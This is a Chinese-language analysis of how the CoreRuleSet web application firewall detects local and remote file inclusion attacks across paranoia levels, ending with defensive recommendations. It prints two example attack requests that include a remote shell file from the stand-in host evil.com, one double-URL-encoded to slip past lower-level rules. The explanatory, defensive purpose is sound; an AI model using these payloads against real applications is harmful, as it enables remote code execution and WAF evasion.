CoreRuleSet项目中的LFI/RFI绕过技术分析

背景介绍

CoreRuleSet(CRS)是一个开源的Web应用防火墙规则集，广泛应用于保护Web应用免受各种攻击。其中，本地文件包含(LFI)和远程文件包含(RFI)是Web安全中常见的攻击方式，攻击者通过包含恶意文件来执行任意代码或获取敏感信息。

LFI/RFI攻击原理

LFI(本地文件包含)和RFI(远程文件包含)都是文件包含漏洞的表现形式。攻击者通过操纵应用程序的文件包含参数，使其加载并执行非预期的文件。RFI比LFI更危险，因为它允许从远程服务器加载恶意代码。

CRS对LFI/RFI的防护机制

CRS采用多层次的防护策略，通过不同的Paranoia级别(PL)提供渐进式的安全防护：

1. PL-1级别：仅检测基于IP地址的RFI攻击
2. PL-2级别：检测所有域外引用的RFI攻击
3. PL-3级别：增加对多重编码等高级绕过技术的检测

实际绕过案例分析

案例1：简单RFI攻击

攻击者尝试通过直接包含远程URL来实施RFI攻击：

/?file=http://evil.com/shell.txt

在PL-2级别下，CRS能够有效识别并拦截此类攻击，触发规则931130，标记为"Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"。

案例2：编码绕过攻击

攻击者使用双重URL编码试图绕过检测：

/?file=http:%252f%252fevil.com%252fshell.txt

这种技术在PL-3级别下会被检测到，触发以下规则：

• 920230(PL2)：多重URL编码检测
• 920272(PL3)：请求中包含ASCII 127以外的无效字符

防护建议

1. 合理设置Paranoia级别：根据业务需求选择适当的防护级别，PL-2能提供较好的平衡，PL-3则提供更严格的防护。
2. 输入验证：应用程序自身应对文件包含参数进行严格验证，限制可包含的文件范围。
3. 禁用危险函数：在PHP环境中，可以考虑禁用allow_url_fopen和allow_url_include等危险配置。
4. 日志监控：即使某些攻击未被拦截，也应通过日志分析发现可疑行为。

总结

CoreRuleSet通过多层次的防护机制有效防御了大多数LFI/RFI攻击。虽然高级编码技术可能在较低防护级别下实现绕过，但提升Paranoia级别可以解决这一问题。安全防护应当采用纵深防御策略，结合WAF规则和应用程序自身的安全措施，才能提供全面的保护。